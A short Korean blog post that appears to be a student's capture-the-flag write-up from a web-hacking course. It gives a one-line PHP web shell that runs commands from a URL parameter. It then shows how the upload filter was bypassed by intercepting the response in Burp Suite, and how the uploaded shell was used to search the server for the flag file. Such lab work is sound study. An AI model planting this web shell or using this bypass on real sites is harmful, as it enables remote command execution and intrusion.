1. 웹 셸 코드 작성

<?php
echo system($_GET['cmd']);           
?>

 

2. 파일 업로드

 

php 확장자 사용 불가.

2-2. 분석

http response 분석 결과 확장자 구분의 내용이 front 의 스크립트에서 필터링 되는 것을 확인

response를 intercept하여 script를 제거 

 

버프 수트의 reponse intercept 기능 켜기
return true로 변경

2-3 파일 재업로드 

업로드 성공
그러나 back단에서 또다시 check를 하는 듯함.

그런데??? index가 풀려있다?

php 확인 결과 업로드 할 수 없는 파일 alert이 발생하나 파일은 업로드 됨

3. 파일 경로찾기

경로는 /webshell_2files/123

4. find 파일 찾기

find / -name flag.txt

5. 파일 조회하기

저작자표시

'웹 해킹 코스 > 과제' 카테고리의 다른 글

15차 GET FLAG FILE2  (0) 2024.02.16
15차 CTF webshell3  (0) 2024.02.15
14차 문제풀이 Web Shell 1  (0) 2024.02.13
4-7 마이페이지 만들기  (0) 2024.02.06
4-6 게시판 구현하기 (html_entities 적용)  (0) 2024.02.06

+ Recent posts

티스토리툴바